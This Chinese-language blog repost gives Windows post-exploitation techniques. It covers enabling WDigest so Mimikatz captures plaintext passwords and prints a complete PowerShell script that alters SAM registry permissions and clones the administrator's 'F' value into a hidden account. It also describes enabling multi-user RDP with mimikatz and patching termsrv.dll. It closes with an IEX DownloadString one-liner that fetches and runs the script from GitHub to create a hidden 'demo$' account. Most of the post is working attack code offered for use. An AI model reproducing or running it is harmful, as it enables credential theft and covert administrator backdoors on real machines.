标签:shell脚本 contain order exit tin win parameter mat 图片
最近做测试的时候发现,windows server2012 使用Mimikatz是直接抓不到明文密码的,而且,直接创建的账号登陆有时会碰到这个问题:
ps:2012抓明文需要HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest的"UseLogonCredential"设置为1,类型为DWORD 32才可以,然后下次用户再登录,才能记录到明文密码。
后来发现以前的建立克隆账号的方式是可以使得新建的账号登陆系统的,为了方便,整理了一个powershell脚本,脚本可以自动修改注册表键值权限(需要用administrator权限运行,即bypassuac以后的权限),之后在进行操作。具体代码如下:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
|
function Create-Clone{<#.SYNOPSISThis script requires Administrator privileges. use Invoke-TokenManipulation.ps1 to get system privileges and create the clone user..PARAMETER uThe clone username.PARAMETER pThe clone user‘s password.PARAMETER cuThe user to clone, default administrator .EXAMPLECreate-Clone -u evi1cg -p evi1cg123 -cu administrator#> Param( [Parameter(Mandatory=$true)] [String] $u, [Parameter(Mandatory=$true)] [String] $p, [Parameter(Mandatory=$false)] [String] $cu = "administrator" ) function upReg{ "HKEY_LOCAL_MACHINE\SAM [1 17]" | Out-File $env:temp\up.ini "HKEY_LOCAL_MACHINE\SAM\SAM [1 17]"| Out-File -Append $env:temp\up.ini "HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1 17]" | Out-File -Append $env:temp\up.ini "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1 17] "| Out-File -Append $env:temp\up.ini "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1 17] "| Out-File -Append $env:temp\up.ini "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1 17]"| Out-File -Append $env:temp\up.ini cmd /c "regini $env:temp\up.ini" Remove-Item $env:temp\up.ini } function downreg { "HKEY_LOCAL_MACHINE\SAM [1 17]" | Out-File $env:temp\down.ini "HKEY_LOCAL_MACHINE\SAM\SAM [17]"| Out-File -Append $env:temp\down.ini "HKEY_LOCAL_MACHINE\SAM\SAM\Domains [17]" | Out-File -Append $env:temp\down.ini "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [17] "| Out-File -Append $env:temp\down.ini "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [17] "| Out-File -Append $env:temp\down.ini "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [17]"| Out-File -Append $env:temp\down.ini cmd /c "regini $env:temp\down.ini" Remove-Item $env:temp\down.ini } function Create-user ([string]$Username,[string]$Password) { $group = "Administrators" $existing = Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$Username" if (!$existing) { Write-Host "[*] Creating new local user $Username with password $Password" & NET USER $Username $Password /add /y /expires:never | Out-Null Write-Host "[*] Adding local user $Username to $group." & NET LOCALGROUP $group $Username /add | Out-Null } else { Write-Host "[*] Adding existing user $Username to $group." & NET LOCALGROUP $group $Username /add | Out-Null $exist = $adsi.Children | where {$_.SchemaClassName -eq ‘user‘ -and $_.Name -eq $Username } Write-Host "[*] Setting password for existing local user $Username" $exist.SetPassword($Password) } Write-Host "[*] Ensuring password for $Username never expires." & WMIC USERACCOUNT WHERE "Name=‘$Username‘" SET PasswordExpires=FALSE | Out-Null } function GetUser-Key([string]$user) { cmd /c " echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user [1 17] >> $env:temp\$user.ini" cmd /c "regini $env:temp\$user.ini" Remove-Item $env:temp\$user.ini if(Test-Path -Path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$user"){ cmd /c "regedit /e $env:temp\$user.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user"" $file = Get-Content "$env:temp\$user.reg" | Out-String $pattern="@=hex\((.*?)\)\:" $file -match $pattern |Out-Null $key = "00000"+$matches[1] Write-Host "[!]"$key return $key }else { Write-Host "[-] SomeThing Wrong !" } } function Clone ([string]$ukey,[string]$cukey) { "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey [1 17] "| Out-File $env:temp\f.ini "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$cukey [1 17] " | Out-File $env:temp\f.ini cmd /c " regini $env:temp\f.ini" Remove-Item $env:temp\f.ini $ureg = "HKLM:\SAM\SAM\Domains\Account\Users\$ukey" |Out-String $cureg = "HKLM:\SAM\SAM\Domains\Account\Users\$cukey" |Out-String Write-Host "[*] Get clone user‘F value" $cuFreg = Get-Item -Path $cureg.Trim() $cuFvalue = $cuFreg.GetValue(‘F‘) Write-Host "[*] Change user‘F value" Set-ItemProperty -path $ureg.Trim() -Name "F" -value $cuFvalue $outreg = "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey" cmd /c "regedit /e $env:temp\out.reg $outreg.Trim()" } function Main () { if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { Write-Output "Script must be run as administrator" break } Write-Output "[*] Start" Write-Output "[*] Tring to change reg privilege !" upReg if( !(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$cu")){ Write-Host "[-] The User to Clone does not exist !" Write-Output "[*] Change reg privilege back !" downReg Write-Output "[*] Exiting !" } else { if(!(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$u")){ $tmp = "1" } else{ $tmp = "0" } Write-Output "[*] Create User..." Create-user $u $p Write-Output "[*] Get User $u‘s Key .." $ukey = GetUser-Key $u |Out-String Write-Output "[*] Get User $cu‘s Key .." $cukey = GetUser-Key $cu |Out-String Write-Output "[*] Clone User.." Clone $ukey $cukey if($tmp -eq 1 ){ Write-Output "[*] Delete User.." cmd /c "net User $u /del " |Out-Null }else{ Write-Output "[*] Don‘t need to delete.."} cmd /c "regedit /s $env:temp\$u.reg" cmd /c "regedit /s $env:temp\out.reg" Remove-Item $env:temp\*.reg Write-Output "[*] Change reg privilege back !" downreg Write-Output "[*] Done" } } Main} |
GITHUB:
新建账号以后,可成功登陆系统
在Win7上做的测试如下:
当然可以配合这个姿势来实现多用户登陆。
使用mimikatz.exe,执行ts::multirdp允许多用户远程登录
ps:该方法在系统重启后失效,下次使用需要重新执行命令ts::multirdp,也可通过修改文件termsrv.dll实现永久修改
最后是远程执行的方式:
|
1
|
powershell IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Create-Clone.ps1‘); Create-Clone -u demo$ -p test123 |
标签:shell脚本 contain order exit tin win parameter mat 图片
原文地址:https://www.cnblogs.com/hookjoy/p/9899923.html
